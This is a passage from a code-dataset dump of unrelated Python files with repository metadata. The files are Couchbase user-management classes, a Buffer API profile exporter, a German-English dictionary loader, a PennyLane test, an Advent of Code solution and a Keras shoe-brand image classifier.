output\n\n @classmethod\n def create_user(cls, raw_data, roles=None):\n\n user_roles = roles\n if not user_roles:\n user_roles = set(map(lambda r: Role.create_role(r),\n raw_data.get(\"roles\")))\n\n # RBAC prior to v6.5 does not have groups\n group_data = raw_data.get(\"groups\", None)\n\n return cls(\n username=raw_data.get(\"username\"),\n display_name=raw_data.get(\"display_name\"),\n roles=user_roles,\n groups=set(group_data) if group_data else None\n )\n\n\nclass UserAndMetadata:\n \"\"\"\n Models the \"get user\" / \"get all users\" response.\n\n Associates the mutable properties of a user with\n derived properties such as the effective
roles\n inherited from groups.\n \"\"\"\n\n def __init__(self,\n domain=None, # type: AuthDomain\n user=None, # type: User\n effective_roles=[], # type: List[RoleAndOrigins]\n password_changed=None, # type: datetime\n external_groups=None, # type: Set[str]\n **kwargs # type: Dict[str, Any]\n ):\n\n self._domain = domain\n self._user = user\n self._effective_roles = effective_roles\n self._password_changed = password_changed\n self._external_groups = external_groups\n self._raw_data = kwargs.get(\"raw_data\", None)\n\n @property\n def domain(self) -> AuthDomain:\n \"\"\" AuthDomain is an enumeration with values \"local\" and \"external\".\n It MAY alternatively be represented as String.\"\"\"\n return self._domain\n\n @property\n def user(self) -> User:\n \"\"\"returns a new mutable User object each time this method is called.\n Modifying the fields of the returned User MUST have no effect on the\n UserAndMetadata object it came from.\"\"\"\n return deepcopy(self._user)\n\n @property\n def effective_roles(self) -> List[RoleAndOrigins]:\n \"\"\"all roles, regardless of origin.\"\"\"\n return self._effective_roles\n\n @property\n def password_changed(self) -> Optional[datetime]:\n return self._password_changed\n\n @property\n def external_groups(self) -> Set[str]:\n return self._external_groups\n\n @property\n def raw_data(self) -> Dict[str, Any]:\n return self._raw_data\n\n @classmethod\n def create_user_and_metadata(cls, raw_data):\n\n effective_roles = list(map(lambda r: RoleAndOrigins.create_role_and_origins(r),\n raw_data.get(\"effective_roles\")))\n\n user_roles = set(r.role for r in effective_roles\n if any(map(lambda o: o.type == \"user\", r.origins)) or len(r.origins) == 0)\n\n # RBAC prior to v6.5 does not have groups\n ext_group_data = raw_data.get(\"external_groups\", None)\n\n # password_change_date is optional\n pw_data = raw_data.get(\"password_changed\", None)\n pw_changed = None\n formats = ['%Y-%m-%dT%H:%M:%S.%fZ', '%Y-%m-%dT%H:%M:%SZ']\n for f in formats:\n if pw_changed:\n break\n\n try:\n pw_changed = datetime.strptime(pw_data, f)\n except Exception: # nosec\n pass\n\n return cls(\n domain=AuthDomain.from_str(raw_data.get(\"domain\")),\n effective_roles=effective_roles,\n user=User.create_user(raw_data.get(\"user\"), roles=user_roles),\n password_changed=pw_changed,\n external_groups=set(ext_group_data) if ext_group_data else None,\n raw_data=raw_data\n )\n\n\nclass Group:\n def __init__(self,\n name=None, # type: str\n description=None, # type: str\n roles=None, # type: Set[Role]\n ldap_group_reference=None, # type: str\n **kwargs # type: Any\n ):\n\n if not name:\n raise InvalidArgumentException('A group must have a name')\n\n self._name = name\n self._description = description\n self._roles = UserManagementUtils.to_set(roles, Role, 'Roles')\n self._ldap_group_reference = ldap_group_reference\n self._raw_data = kwargs.get('raw_data', None)\n\n @property\n def name(self) -> str:\n return self._name\n\n @property\n def description(self) -> str:\n return self._description\n\n @description.setter\n def description(self,\n value # type: str\n ):\n self._description = value\n\n @property\n def roles(self) -> Set[Role]:\n return self._roles\n\n @roles.setter\n def roles(self,\n value # type: Set[Role]\n ):\n self._roles = UserManagementUtils.to_set(value, Role, 'Roles')\n\n @property\n def ldap_group_reference(self) -> str:\n return self._ldap_group_reference\n\n @ldap_group_reference.setter\n def ldap_group_reference(self,\n value # type: str\n ):\n self._ldap_group_reference 
= value\n\n @property\n def raw_data(self) -> Dict[str, Any]:\n return self._raw_data\n\n def as_dict(self):\n rs = list(map(lambda r: r.as_dict(), self.roles))\n return {\n 'name': self.name,\n 'description': self.description,\n 'roles': rs,\n 'ldap_group_reference': self.ldap_group_reference\n }\n\n @classmethod\n def create_group(cls, raw_data):\n return cls(\n raw_data.get('name'),\n description=raw_data.get('description', None),\n roles=set(map(lambda r: Role.create_role(\n r), raw_data.get('roles'))),\n ldap_group_reference=raw_data.get('ldap_group_ref', None)\n )\n", "repo_name": "couchbase/couchbase-python-client", "sub_path": "couchbase/management/logic/users_logic.py", "file_name": "users_logic.py", "file_ext": "py", "file_size_in_byte": 26068, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 239, "dataset": "github-code", "pt": "52", "api": [{"api_name": "typing.TYPE_CHECKING", "line_number": 25, "usage_type": "name"}, {"api_name": "couchbase.exceptions.GroupNotFoundException", "line_number": 40, "usage_type": "name"}, {"api_name": "couchbase.exceptions.UserNotFoundException", "line_number": 41, "usage_type": "name"}, {"api_name": "couchbase.exceptions.FeatureUnavailableException", "line_number": 42, "usage_type": "name"}, {"api_name": "couchbase.exceptions.FeatureUnavailableException", "line_number": 43, "usage_type": "name"}, {"api_name": "couchbase.exceptions.RateLimitedException", "line_number": 44, "usage_type": "name"}, {"api_name": "couchbase.auth.AuthDomain", "line_number": 54, "usage_type": "argument"}, {"api_name": "couchbase.auth.AuthDomain.to_str", "line_number": 55, "usage_type": "call"}, {"api_name": "couchbase.auth.AuthDomain", "line_number": 55, "usage_type": "name"}, {"api_name": "couchbase.exceptions.InvalidArgumentException", "line_number": 57, "usage_type": "call"}, {"api_name": "couchbase.options.forward_args", "line_number": 65, "usage_type": "call"}, {"api_name": "couchbase.pycbc_core.mgmt_operations.USER", "line_number": 77, "usage_type": "attribute"}, {"api_name": "couchbase.pycbc_core.mgmt_operations", "line_number": 77, "usage_type": "name"}, {"api_name": "couchbase.pycbc_core.user_mgmt_operations.GET_USER", "line_number": 78, "usage_type": "attribute"}, {"api_name": "couchbase.pycbc_core.user_mgmt_operations", "line_number": 78, "usage_type": "name"}, {"api_name": "couchbase.pycbc_core.management_operation", "line_number": 93, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 63, "usage_type": "name"}, {"api_name": "couchbase.options.forward_args", "line_number": 99, "usage_type": "call"}, {"api_name": "couchbase.pycbc_core.mgmt_operations.USER", "line_number": 109, "usage_type": "attribute"}, {"api_name": "couchbase.pycbc_core.mgmt_operations", "line_number": 109, "usage_type": "name"}, {"api_name": "couchbase.pycbc_core.user_mgmt_operations.GET_ALL_USERS", "line_number": 110, "usage_type": "attribute"}, {"api_name": "couchbase.pycbc_core.user_mgmt_operations", "line_number": 110, "usage_type": "name"}, {"api_name": "couchbase.pycbc_core.management_operation", "line_number": 125, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 98, "usage_type": "name"}, {"api_name": "typing.Iterable", "line_number": 98, "usage_type": "name"}, {"api_name": "couchbase.options.forward_args", "line_number": 133, "usage_type": "call"}, {"api_name": "couchbase.exceptions.InvalidArgumentException", "line_number": 138, "usage_type": "call"}, {"api_name":
"couchbase.exceptions.InvalidArgumentException", "line_number": 144, "usage_type": "call"}, {"api_name": "couchbase.pycbc_core.mgmt_operations.USER", "line_number": 157, "usage_type": "attribute"}, {"api_name": "couchbase.pycbc_core.mgmt_operations", "line_number": 157, "usage_type": "name"}, {"api_name": "couchbase.pycbc_core.user_mgmt_operations.UPSERT_USER", "line_number": 158, "usage_type": "attribute"}, {"api_name": "couchbase.pycbc_core.user_mgmt_operations", "line_number": 158, "usage_type": "name"}, {"api_name": "couchbase.pycbc_core.management_operation", "line_number": 173, "usage_type": "call"}, {"api_name": "couchbase.options.forward_args", "line_number": 181, "usage_type": "call"}, {"api_name": "couchbase.pycbc_core.mgmt_operations.USER", "line_number": 192, "usage_type": "attribute"}, {"api_name": "couchbase.pycbc_core.mgmt_operations", "line_number": 192, "usage_type": "name"}, {"api_name": "couchbase.pycbc_core.user_mgmt_operations.DROP_USER", "line_number": 193, "usage_type": "attribute"}, {"api_name": "couchbase.pycbc_core.user_mgmt_operations", "line_number": 193, "usage_type": "name"}, {"api_name": "couchbase.pycbc_core.management_operation", "line_number": 208, "usage_type": "call"}, {"api_name": "couchbase.options.forward_args", "line_number": 216, "usage_type": "call"}, {"api_name": "couchbase.pycbc_core.mgmt_operations.USER", "line_number": 224, "usage_type": "attribute"}, {"api_name": "couchbase.pycbc_core.mgmt_operations", "line_number": 224, "usage_type": "name"}, {"api_name": "couchbase.pycbc_core.user_mgmt_operations.CHANGE_PASSWORD", "line_number": 225, "usage_type": "attribute"}, {"api_name": "couchbase.pycbc_core.user_mgmt_operations", "line_number": 225, "usage_type": "name"}, {"api_name": "couchbase.pycbc_core.management_operation", "line_number": 240, "usage_type": "call"}, {"api_name": "couchbase.pycbc_core.mgmt_operations.USER", "line_number": 249, "usage_type": "attribute"}, {"api_name": "couchbase.pycbc_core.mgmt_operations", "line_number": 249, "usage_type": "name"}, {"api_name": "couchbase.pycbc_core.user_mgmt_operations.GET_ROLES", "line_number": 250, "usage_type": "attribute"}, {"api_name": "couchbase.pycbc_core.user_mgmt_operations", "line_number": 250, "usage_type": "name"}, {"api_name": "couchbase.options.forward_args", "line_number": 260, "usage_type": "call"}, {"api_name": "couchbase.pycbc_core.management_operation", "line_number": 264, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 245, "usage_type": "name"}, {"api_name": "typing.Iterable", "line_number": 245, "usage_type": "name"}, {"api_name": "couchbase.pycbc_core.mgmt_operations.USER", "line_number": 278, "usage_type": "attribute"}, {"api_name": "couchbase.pycbc_core.mgmt_operations", "line_number": 278, "usage_type": "name"}, {"api_name": "couchbase.pycbc_core.user_mgmt_operations.GET_GROUP", "line_number": 279, "usage_type": "attribute"}, {"api_name": "couchbase.pycbc_core.user_mgmt_operations", "line_number": 279, "usage_type": "name"}, {"api_name": "couchbase.options.forward_args", "line_number": 291, "usage_type": "call"}, {"api_name": "couchbase.pycbc_core.management_operation", "line_number": 295, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 270, "usage_type": "name"}, {"api_name": "couchbase.pycbc_core.mgmt_operations.USER", "line_number": 304, "usage_type": "attribute"}, {"api_name": "couchbase.pycbc_core.mgmt_operations", "line_number": 304, "usage_type": "name"}, {"api_name": 
"couchbase.pycbc_core.user_mgmt_operations.GET_ALL_GROUPS", "line_number": 305, "usage_type": "attribute"}, {"api_name": "couchbase.pycbc_core.user_mgmt_operations", "line_number": 305, "usage_type": "name"}, {"api_name": "couchbase.options.forward_args", "line_number": 316, "usage_type": "call"}, {"api_name": "couchbase.pycbc_core.management_operation", "line_number": 320, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 300, "usage_type": "name"}, {"api_name": "typing.Iterable", "line_number": 300, "usage_type": "name"}, {"api_name": "couchbase.pycbc_core.mgmt_operations.USER", "line_number": 340, "usage_type": "attribute"}, {"api_name": "couchbase.pycbc_core.mgmt_operations", "line_number": 340, "usage_type": "name"}, {"api_name": "couchbase.pycbc_core.user_mgmt_operations.UPSERT_GROUP", "line_number": 341, "usage_type": "attribute"}, {"api_name": "couchbase.pycbc_core.user_mgmt_operations", "line_number": 341, "usage_type": "name"}, {"api_name": "couchbase.options.forward_args", "line_number": 353, "usage_type": "call"}, {"api_name": "couchbase.pycbc_core.management_operation", "line_number": 357, "usage_type": "call"}, {"api_name": "couchbase.pycbc_core.mgmt_operations.USER", "line_number": 371, "usage_type": "attribute"}, {"api_name": "couchbase.pycbc_core.mgmt_operations", "line_number": 371, "usage_type": "name"}, {"api_name": "couchbase.pycbc_core.user_mgmt_operations.DROP_GROUP", "line_number": 372, "usage_type": "attribute"}, {"api_name": "couchbase.pycbc_core.user_mgmt_operations", "line_number": 372, "usage_type": "name"}, {"api_name": "couchbase.options.forward_args", "line_number": 384, "usage_type": "call"}, {"api_name": "couchbase.pycbc_core.management_operation", "line_number": 388, "usage_type": "call"}, {"api_name": "couchbase.exceptions.InvalidArgumentException", "line_number": 413, "usage_type": "call"}, {"api_name": "couchbase.exceptions.InvalidArgumentException", "line_number": 421, "usage_type": "call"}, {"api_name": "couchbase.exceptions.InvalidArgumentException", "line_number": 436, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 569, "usage_type": "name"}, {"api_name": "couchbase.exceptions.InvalidArgumentException", "line_number": 596, "usage_type": "call"}, {"api_name": "typing.Set", "line_number": 619, "usage_type": "name"}, {"api_name": "typing.Set", "line_number": 630, "usage_type": "name"}, {"api_name": "couchbase.auth.AuthDomain", "line_number": 705, "usage_type": "name"}, {"api_name": "copy.deepcopy", "line_number": 715, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 718, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 723, "usage_type": "name"}, {"api_name": "datetime.datetime", "line_number": 723, "usage_type": "name"}, {"api_name": "typing.Set", "line_number": 727, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 731, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 731, "usage_type": "name"}, {"api_name": "datetime.datetime.strptime", "line_number": 755, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 755, "usage_type": "name"}, {"api_name": "couchbase.auth.AuthDomain.from_str", "line_number": 760, "usage_type": "call"}, {"api_name": "couchbase.auth.AuthDomain", "line_number": 760, "usage_type": "name"}, {"api_name": "couchbase.exceptions.InvalidArgumentException", "line_number": 779, "usage_type": "call"}, {"api_name": "typing.Set", "line_number": 802, "usage_type": "name"}, {"api_name": "typing.Dict", 
"line_number": 822, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 822, "usage_type": "name"}]} +{"seq_id": "9381833499", "text": "#!/usr/local/bin/python3\n\"\"\"\nThis will export the profile_ids to a csv_file.\nYou can export this CSV into your Alfred List Filter\n\"\"\"\n\nimport requests\nimport json\nimport csv\n\n# You will need to register your app to get this token https://buffer.com/developers/apps/create\ntoken = ''\n\nurl = f'https://api.bufferapp.com/1/profiles.json?access_token={token}'\nr = requests.get(url)\nprofiles = json.loads(r.text)\nwith open('profiles.csv', 'w', newline='') as csvfile:\n csvwriter = csv.writer(csvfile)\n for profile in profiles:\n csvwriter.writerow([profile['service_username'], profile['formatted_service'], profile['_id']])\n", "repo_name": "kjaymiller/alfred-buffer", "sub_path": "list_buffer_ids.py", "file_name": "list_buffer_ids.py", "file_ext": "py", "file_size_in_byte": 651, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "requests.get", "line_number": 15, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 16, "usage_type": "call"}, {"api_name": "csv.writer", "line_number": 18, "usage_type": "call"}]} +{"seq_id": "10135630857", "text": "import gzip\nimport magic\nimport re\n\nclass GermanToEnglishDictionary:\n \"\"\"\n Loads a german-to-english dictionary from Ding's dictionary file\n (https://www-user.tu-chemnitz.de/~fri/ding/).\n \"\"\"\n\n def __init__(self):\n self._german_words = {}\n\n def add_words_from_ding_definition(definition_text, word_dictionary):\n \"\"\" Add word definitions from a line in DING's text file. \"\"\"\n\n # Example line: \n #'Flugzeit {f} | Flugzeiten {pl} :: flying time | flying times'\n\n # Ignore comment lines.\n if re.match('\\s*#', definition_text):\n return \n\n # Divide line up into a list of words and a list of definitions.\n # Strip any whitespace.\n words, definitions = definition_text.split(\"::\")\n words = [word.strip() for word in words.split('|')]\n definitions = [definition.strip() for definition in \n definitions.split('|')]\n\n if len(words) != len(definitions):\n raise ValueError('Unequal number of words and definitions in line'\n 'for words: {}'.format(words))\n\n for i in range(len(words)):\n\n # Words may be split by semicolons.\n # Give them all the same definition.\n for word in words[i].split(';'):\n\n word = word.strip()\n\n word_parameters = re.match(\n\n # Get everyting up to a '{'\n # Word entries may include space, punctuation, or addemdums.\n '([^{]+)' \n\n # If there's a form, e.g. 
'{pl}' present, get it.\n '(?:{([^}]+)})?', \n\n word)\n\n if not word_parameters:\n raise ValueError('Unable to parse line with words: {}'\n .format(word))\n\n word_groups = word_parameters.groups()\n word_key = word_groups[0].strip()\n\n # If word has a form, put anything after it back on the word.\n if word_groups[1]:\n addendum = word[word_parameters.span()[1]:].strip()\n if addendum:\n word_key += ' ' + addendum\n\n word_entry = {\n 'word': word_key,\n 'definition': definitions[i],\n 'base_word_length': len(word_groups[0].strip())\n }\n\n if word_groups[1]:\n word_entry['form'] = word_groups[1]\n else:\n word_entry['form'] = None\n\n word_dictionary[word_key] = word_entry\n\n def read_from_ding_file(self, *, file_name):\n \"\"\"\n Read definitions from a dictionary in Ding's format.\n File may be a Gzip file or plain text.\n \"\"\"\n\n with magic.Magic(flags=magic.MAGIC_MIME_TYPE) as m:\n if m.id_filename(file_name) == 'application/gzip':\n dictionary_text = gzip.open(file_name, 'rt')\n else:\n dictionary_text = open(file_name, 'r')\n\n for definition_text in dictionary_text:\n GermanToEnglishDictionary.add_words_from_ding_definition(\n definition_text, self._german_words)\n\n def __iter__(self):\n \"\"\" Get an iterable of all words in the dictionary. \"\"\"\n\n def _word_generator(self):\n for key in self._german_words:\n yield self._german_words[key]\n return _word_generator(self)\n\n def __len__(self):\n \"\"\" Get the number of words in the dictionary. \"\"\"\n return len(self._german_words)\n\n def filter(self, *, key_substring):\n \"\"\" Get an iterable filter matching the given substring. \"\"\"\n\n for key in self._german_words:\n if key_substring in key:\n yield self._german_words[key]\n", "repo_name": "Jimm64/translate", "sub_path": "de_en/dictionary.py", "file_name": "dictionary.py", "file_ext": "py", "file_size_in_byte": 3824, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "re.match", "line_number": 21, "usage_type": "call"}, {"api_name": "re.match", "line_number": 43, "usage_type": "call"}, {"api_name": "magic.Magic", "line_number": 86, "usage_type": "call"}, {"api_name": "magic.MAGIC_MIME_TYPE", "line_number": 86, "usage_type": "attribute"}, {"api_name": "gzip.open", "line_number": 88, "usage_type": "call"}]} +{"seq_id": "31504751362", "text": "import pytest\n\nfrom pennylane.data.attributes.json import DatasetJSON\n\npytestmark = pytest.mark.data\n\n\n@pytest.mark.parametrize(\n \"value\",\n [\"string\", 1, {\"one\": \"two\"}, None, [1, \"two\"]],\n)\nclass TestDatasetJSON:\n def test_value_init(self, value):\n \"\"\"Test that DatasetJSON is correctly value-initialized.\"\"\"\n dset_json = DatasetJSON(value)\n\n assert dset_json.get_value() == value\n\n def test_bind_init(self, value):\n \"\"\"Test that DatasetJSON is correctly bind-initialized.\"\"\"\n bind = DatasetJSON(value).bind\n\n assert DatasetJSON(bind=bind).get_value() == value\n", "repo_name": "PennyLaneAI/pennylane", "sub_path": "tests/data/attributes/test_json.py", "file_name": "test_json.py", "file_ext": "py", "file_size_in_byte": 616, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1965, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pytest.mark", "line_number": 5, "usage_type": "attribute"}, {"api_name": "pennylane.data.attributes.json.DatasetJSON", "line_number": 15, "usage_type": "call"}, {"api_name": "pennylane.data.attributes.json.DatasetJSON", "line_number": 21, "usage_type": 
"call"}, {"api_name": "pennylane.data.attributes.json.DatasetJSON", "line_number": 23, "usage_type": "call"}, {"api_name": "pytest.mark.parametrize", "line_number": 8, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 8, "usage_type": "attribute"}]} +{"seq_id": "2167632970", "text": "import pathlib\nfrom collections import defaultdict\n\n\ndef find_joltage_differences_product(adapters: list[int]) -> int:\n jolt_differences = defaultdict(int)\n for index, adapter_jolts in enumerate(adapters[:-1]):\n jolt_differences[adapters[index + 1] - adapter_jolts] += 1\n return jolt_differences[1] * jolt_differences[3]\n\n\ndef find_num_valid_arrangements(adapters: list[int]) -> int:\n num_valid_arrangements = {0: 1}\n for adapter_jolts in adapters[1:]:\n num_valid_arrangements[adapter_jolts] = sum(\n num_valid_arrangements.get(adapter_jolts - jolt_difference, 0)\n for jolt_difference in range(1, 4)\n )\n return num_valid_arrangements[adapters[-1]]\n\n\nwith open(pathlib.Path(__file__).parent.parent / 'input.txt') as f:\n adapters = sorted(int(line) for line in f.read().splitlines())\n\nadapters.insert(0, 0)\nadapters.append(adapters[-1] + 3)\n\npart_one_solution = find_joltage_differences_product(adapters)\npart_two_solution = find_num_valid_arrangements(adapters)\n\nprint('Part One:', part_one_solution)\nprint('Part Two:', part_two_solution)\n\nassert part_one_solution == 2112\nassert part_two_solution == 3022415986688\n", "repo_name": "rhlahuja/advent-of-code-2020", "sub_path": "day-10/python/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 1177, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "collections.defaultdict", "line_number": 6, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 22, "usage_type": "call"}]} +{"seq_id": "2792129827", "text": "from tensorflow import keras\nfrom tensorflow.keras.applications.inception_v3 import InceptionV3\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Conv2D, Flatten, MaxPooling2D, Dense, Dropout, GlobalAveragePooling2D\nfrom tensorflow.keras import optimizers, losses\nfrom tensorflow.keras.callbacks import ModelCheckpoint\nfrom tensorflow.keras.preprocessing import image\n\nimport pickle\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\n\n# notes\n# adidas - 285\n# altra - 138\n# asics - 455\n# joma - 144\n# nike - 205\n# new balance - 155\nbase_dir = 'train'\n\ndatagenerator = {\n \"train\": ImageDataGenerator(horizontal_flip=True,\n vertical_flip=True,\n rescale=1. 
/ 255,\n validation_split=0.1,\n shear_range=0.1,\n zoom_range=0.1,\n width_shift_range=0.1,\n height_shift_range=0.1,\n rotation_range=30,\n ).flow_from_directory(directory=base_dir,\n target_size=(300, 300),\n subset='training',\n ),\n\n \"valid\": ImageDataGenerator(rescale=1 / 255,\n validation_split=0.1,\n ).flow_from_directory(directory=base_dir,\n target_size=(300, 300),\n subset='validation',\n ),\n}\n\n# Initializing InceptionV3 (pretrained) model with input image shape as (300, 300, 3)\nbase_model = InceptionV3(weights=None, include_top=False, input_shape=(300, 300, 3))\n\n# Load Weights for the InceptionV3 Model\nbase_model.load_weights('inception_v3_weights_tf_dim_ordering_tf_kernels_notop.h5')\n\n# Setting the Training of all layers of InceptionV3 model to false\nbase_model.trainable = False\n\n# Adding some more layers at the end of the Model as per our requirement\nmodel = Sequential([\n base_model,\n GlobalAveragePooling2D(),\n Dropout(0.15),\n Dense(1024, activation='relu'),\n Dense(6, activation='softmax') # 6 Output Neurons for 6 Classes\n])\n\n# Using the Adam Optimizer to set the learning rate of our final model\nopt = optimizers.Adam(learning_rate=0.0001)\n\n# Compiling and setting the parameters we want our model to use\nmodel.compile(loss=\"categorical_crossentropy\", optimizer=opt, metrics=['accuracy'])\n\n# Viewing the summary of the model\nmodel.summary()\n\n#from keras.utils.vis_utils import plot_model\n#print(plot_model(model, show_shapes=True, show_layer_names=True))\n\n# Setting variables for the model\nbatch_size = 32\nepochs = 10\n\n# Seperating Training and Testing Data\ntrain_generator = datagenerator[\"train\"]\nvalid_generator = datagenerator[\"valid\"]\n\n# Calculating variables for the model\nsteps_per_epoch = train_generator.n // batch_size\nvalidation_steps = valid_generator.n // batch_size\n\nprint(\"steps_per_epoch :\", steps_per_epoch)\nprint(\"validation_steps :\", validation_steps)\n\n# File Path to store the trained models\nfilepath = \"./model_{epoch:02d}-{val_accuracy:.2f}.h5\"\n\n# Using the ModelCheckpoint function to train and store all the best models\ncheckpoint1 = ModelCheckpoint(filepath, monitor='val_accuracy', verbose=1, save_best_only=True, mode='max')\n\ncallbacks_list = [checkpoint1]\n# Training the Model\nhistory = model.fit_generator(generator=train_generator, epochs=epochs, steps_per_epoch=steps_per_epoch,\n validation_data=valid_generator, validation_steps=validation_steps,\n callbacks=callbacks_list)\n\n# val_accuracy improved from 0.84375 to 0.90625, saving model to ./model_10-0.91.h5\n\nacc = history.history['accuracy']\nval_acc = history.history['val_accuracy']\n\nloss = history.history['loss']\nval_loss = history.history['val_loss']\n\n# ________________ Graph 1 -------------------------\n\nplt.figure(figsize=(8, 8))\nplt.subplot(2, 1, 1)\nplt.plot(acc, label='Training Accuracy')\nplt.plot(val_acc, label='Validation Accuracy')\nplt.legend(loc='lower right')\nplt.ylabel('Accuracy')\nplt.ylim([min(plt.ylim()),1])\nplt.title('Training and Validation Accuracy')\n\n# ________________ Graph 2 -------------------------\n\nplt.subplot(2, 1, 2)\nplt.plot(loss, label='Training Loss')\nplt.plot(val_loss, label='Validation Loss')\nplt.legend(loc='upper right')\nplt.ylabel('Cross Entropy')\nplt.ylim([0,max(plt.ylim())])\nplt.title('Training and Validation Loss')\nplt.show()\n\n# val_accuracy improved from 0.84375 to 0.90625, saving model to ./model_10-0.91.h5\n# Calculate the Loss and Accuracy on the Validation Data\ntest_loss, 
test_acc = model.evaluate(valid_generator)\nprint('test accuracy : ', test_acc)\n\n\n# # Check our folder and import the model with best validation accuracy\n# loaded_best_model = keras.models.load_model(\"./model_10-0.80.h5\")\n#\n#\n# # Custom function to load and predict label for the image\n# def predict(img_rel_path):\n# # Import Image from the path with size of (300, 300)\n# img = image.load_img(img_rel_path, target_size=(300, 300))\n#\n# # Convert Image to a numpy array\n# img = image.img_to_array(img, dtype=np.uint8)\n#\n# # Scaling the Image Array values between 0 and 1\n# img = np.array(img) / 255.0\n#\n# # Plotting the Loaded Image\n# plt.title(\"Loaded Image\")\n# plt.axis('off')\n# plt.imshow(img.squeeze())\n# plt.show()\n#\n# # Get the Predicted Label for the loaded Image\n# p = loaded_best_model.predict(img[np.newaxis, ...])\n#\n# # Label array\n# labels = {0: 'adidas', 1: 'converse', 2: 'nike'}\n#\n# print(\"\\n\\nMaximum Probability: \", np.max(p[0], axis=-1))\n# predicted_class = labels[np.argmax(p[0], axis=-1)]\n# print(\"Classified:\", predicted_class, \"\\n\\n\")\n#\n# classes = []\n# prob = []\n# print(\"\\n-------------------Individual Probability--------------------------------\\n\")\n#\n# for i, j in enumerate(p[0], 0):\n# print(labels[i].upper(), ':', round(j * 100, 2), '%')\n# classes.append(labels[i])\n# prob.append(round(j * 100, 2))\n#\n# def plot_bar_x():\n# # this is for plotting purpose\n# index = np.arange(len(classes))\n# plt.bar(index, prob)\n# plt.xlabel('Labels', fontsize=8)\n# plt.ylabel('Probability', fontsize=8)\n# plt.xticks(index, classes, fontsize=8, rotation=20)\n# plt.title('Probability for loaded image')\n# plt.show()\n#\n# plot_bar_x()\n\n", "repo_name": "petrsevcik/shoes_ml", "sub_path": "shoes.py", "file_name": "shoes.py", "file_ext": "py", "file_size_in_byte": 6786, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "warnings.filterwarnings", "line_number": 15, "usage_type": "call"}, {"api_name": "tensorflow.keras.preprocessing.image.ImageDataGenerator", "line_number": 28, "usage_type": "call"}, {"api_name": "tensorflow.keras.preprocessing.image.ImageDataGenerator", "line_number": 42, "usage_type": "call"}, {"api_name": "tensorflow.keras.applications.inception_v3.InceptionV3", "line_number": 51, "usage_type": "call"}, {"api_name": "tensorflow.keras.models.Sequential", "line_number": 60, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.GlobalAveragePooling2D", "line_number": 62, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Dropout", "line_number": 63, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 64, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 65, "usage_type": "call"}, {"api_name": "tensorflow.keras.optimizers.Adam", "line_number": 69, "usage_type": "call"}, {"api_name": "tensorflow.keras.optimizers", "line_number": 69, "usage_type": "name"}, {"api_name": "tensorflow.keras.callbacks.ModelCheckpoint", "line_number": 99, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 117, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 117, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 118, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 118, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 119, "usage_type": "call"}, {"api_name": 
"matplotlib.pyplot", "line_number": 119, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 120, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 120, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 121, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 121, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 122, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 122, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 123, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 123, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 124, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 124, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 128, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 128, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 129, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 129, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 130, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 130, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 131, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 131, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 132, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 132, "usage_type": "name"}, {"api_name": 